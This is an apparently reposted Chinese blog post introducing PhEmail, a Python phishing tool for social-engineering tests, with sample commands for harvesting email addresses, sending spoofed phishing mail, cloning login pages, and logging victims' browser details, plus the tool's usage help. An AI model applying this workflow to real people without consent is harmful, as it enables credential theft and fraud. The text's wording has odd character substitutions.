PhEmail:基于Python的开源网络钓鱼攻击工具

作者: anping 分类: 黑客攻防 发布时间: 2017-09-07 04:25 ė 6 PhEmail:基于Python的开源网络钓鱼攻击工具已关闭评论

PhEmail简介

PhEmail是一款采用Python编程言语开发的开源网络钓鱼邮件工具,它可以协助研讨人员在停止社会工程学测试的进程中自动化地给目的发送网络钓鱼邮件。PhEmail不只可以同时向多个目的用户发送钓鱼邮件并辨认出哪些用户点击了邮件,而且还可以在不应用任何阅读器破绽或邮件客户端破绽的前提下尽能够多地搜集信息。PhEmail自带的引擎可以经过LinkedIN来搜集电子邮箱地址,这些数据可以协助测试人员完成信息采集阶段的一局部任务。

PhEmail:基于Python的开源网络钓鱼攻击工具

除此之外,PhEmail还支持Gmail身份验证,这一功用在目的站点屏蔽了邮件源或IP地址的状况下会十分有用。值得一提的是,该工具还可以克隆目的组织或企业的门户网站登录界面,测试人员可以用这些假造的页面来窃取目的用户的登录凭证。

PhEmail:基于Python的开源网络钓鱼攻击工具

运用样例

普通来说,第一步是搜集目的企业的邮箱地址。PhEmail的搜索引擎在搜集到了企业邮箱地址之后,会将它们保管在一个文件中,演示代码如下:

# phemail.py -g1@example.com 
Gathering emails from domain: example.com100%  
Completed! 
test@example.com 
test2@example.com […] emails.txt updated 

失掉了企业邮箱地址之后,接上去就要创立钓鱼邮件模板了。模板中的每一个URL必需要包括一个字符串”{0}”,由于脚本会自动将这个字符串交换成正确的URL地址。一次真实的测试场景截图如下:

PhEmail:基于Python的开源网络钓鱼攻击工具

接上去,我们需求在Web效劳器上装置php环境并将php文件”index.php”复制到Web效劳器的根目录下。这个文件中包括的JavaScript代码会搜集阅读器信息并将其保管到/tmp目录下的日志文件中。演示实例如下:

# phemail.py -e test-emails.txt -f"Fast Holiday " -r "Fast Holiday " -s "Last MinuteHoliday" -b body.txt -w http://YOUR-WEBSITE.com 
SMTP server: mail.example.com  
Sent to test@example.com 
Error: sending tonotExist-email@example.com  
Phishing URLs point to http://YOUR-WEBSITE.com 
Phemail.py log file saved: phemail-log-12-07-2012_15-42.txt 

接上去,你只需求等候目的用户点击钓鱼邮件,然后你就可以搜集到目的用户的某些阅读器信息了:

Email: test@example.com 
Date: Thu 12/07/2012 11:00:13  
IP: 192.168.0.123  
User Agent: Mozilla/5.0 (Windows NT 6.1;WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 appCodeName: Mozilla appName:Netscape appVersion: 5.0 (Windows) appMinorVersion: undefined product: GeckocookieEnabled: true cpuClass: undefined onLine: true opsProfile: undefineduserProfile: undefined language: en-US platform: Win32 systemLanguage:undefined userLanguage: undefined flash: Enabled Plugins: Google UpdateShockwave Flash 11.3 r300 Google Talk Plugin Video Acceleratorversion:0.1.44.16 Version 3.1.4.8140 5.1.10411.0 Adobe PDF Plug-In For Firefoxand Netscape 10.1.3 NPRuntime Script Plug-in Library for Java™ Deploy VmwareRemote Console and Client Integration Plug-in BlackBerry WebSL Browser Plug-InBing Bar The plug-in allows you to open and edit files using Microsoft Officeapplications Office Authorization plug-in for NPAPI browsers

 

PhEmail项目主页

【 GitHub传送门 】

工具下载

你可以间接经过克隆PhEmail的GitHub代码库来完成工具的下载:

git clone https://github.com/Dionach/PhEmail 

 

工具运用

PHishing EMAIL tool v0.13 
Usage: phemail.py [-e <emails>] [-m<mail_server>] [-f <from_address>] [-r <replay_address>] [-s<subject>] [-b <body>] 
         -e    emails: File containing list of emails(Default: emails.txt) 
         -f    from_address: Source emailaddress displayed in FROM field of the email (Default: Name Surname<name_surname@example.com>) 
         -r    reply_address: Actual emailaddress used to send the emails in case that people reply to the email(Default: Name Surname <name_surname@example.com>) 
         -s    subject: Subject of theemail (Default: Newsletter) 
         -b    body: Body of the email(Default: body.txt) 
         -p    pages: Specifies number ofresults pages searched (Default: 10 pages) 
         -v    verbose: Verbose Mode(Default: false) 
         -l    layout: Send email with noembedded pictures  
         -B    BeEF: Add the hook for BeEF 
         -m    mail_server: SMTP mailserver to connect to 
         -g    Google: Use a google accountusername:password 
         -t    Time delay: Add deleaybetween each email (Default: 3 sec) 
         -R    Bunch of emails per time(Default: 10 emails) 
         -L    webserverLog: Customise thename of the webserver log file (Default: Date time in format"%d_%m_%Y_%H_%M") 
         -S    Search: query on Google 
         -d    domain: of email addresses 
         -n    number: of emails perconnection (Default: 10 emails) 
          -c   clone: Clone a web page 
         -w    website: where the phishingemail link points to 
         -o    save output in a file 
         -F    Format (Default: 0):  
                0- firstname surname 
                1- firstname.surname@example.com 
                2- firstnamesurname@example.com 
                3- f.surname@example.com 
                4- firstname.s@example.com 
                5-surname.firstname@example.com 
                6- s.firstname@example.com 
                7- surname.f@example.com 
                8- surnamefirstname@example.com 
                9- firstname_ 

 

免责声明

请不要在没有失掉目的用户事前赞同的状况下适用PhEmail来停止测试,由运用者本身运用不当所带来的成绩开发人员不承当任何责任,同时我们也对PhEmail所带来的损失概不担任,请大家妥善运用。

本文出自Anpingblog,转载时请注明出处及相应链接。

本文永久链接: http://hezhaoyu.com/archives/507

0
Ɣ回顶部